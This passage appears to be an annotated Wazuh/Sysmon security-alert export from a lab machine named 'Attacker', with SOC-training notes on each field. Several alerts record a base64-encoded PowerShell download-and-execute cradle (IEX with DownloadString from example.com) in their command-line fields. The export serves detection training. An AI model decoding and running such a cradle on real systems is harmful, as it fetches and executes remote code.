data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:34:19.648 ProcessGuid: {94294ddc-bc6a-680a-5b0a-000000000e00} ProcessId: 12136 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_4o4hfpih.vzn.ps1 CreationUtcTime: 2025-04-24 22:34:19.648 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:34:19.648
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bc6a-680a-5b0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12136
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_4o4hfpih.vzn.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:34:19.648
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:47.619+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:47.619+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  9
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534207.837539
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:34:42.0199627Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  281347
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:34:40.473 ProcessGuid: {94294ddc-bc80-680a-710a-000000000e00} ProcessId: 12900 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bc7e-680a-6f0a-000000000e00} ParentProcessId: 2488 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:34:40.473
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bc80-680a-710a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12900
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bc7e-680a-6f0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  2488
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:47.667+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:47.667+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  10
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534207.845605
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:34:43.1695516Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  281372
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:34:42.701 ProcessGuid: {94294ddc-bc82-680a-730a-000000000e00} ProcessId: 14400 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bc80-680a-710a-000000000e00} ParentProcessId: 12900 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:34:42.701
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bc82-680a-730a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  14400
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bc80-680a-710a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  12900
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:48.102+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:48.102+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  12
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534208.853675
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:15.5626418Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  281711
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:35:15.537 ProcessGuid: {94294ddc-bca2-680a-8c0a-000000000e00} ProcessId: 8152 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_rwqywtk0.t2z.ps1 CreationUtcTime: 2025-04-24 22:35:15.537 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:15.537
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bca2-680a-8c0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8152
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_rwqywtk0.t2z.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:35:15.537
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:48.274+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:48.274+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  11
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534208.856439
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:19.7921118Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  281758
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

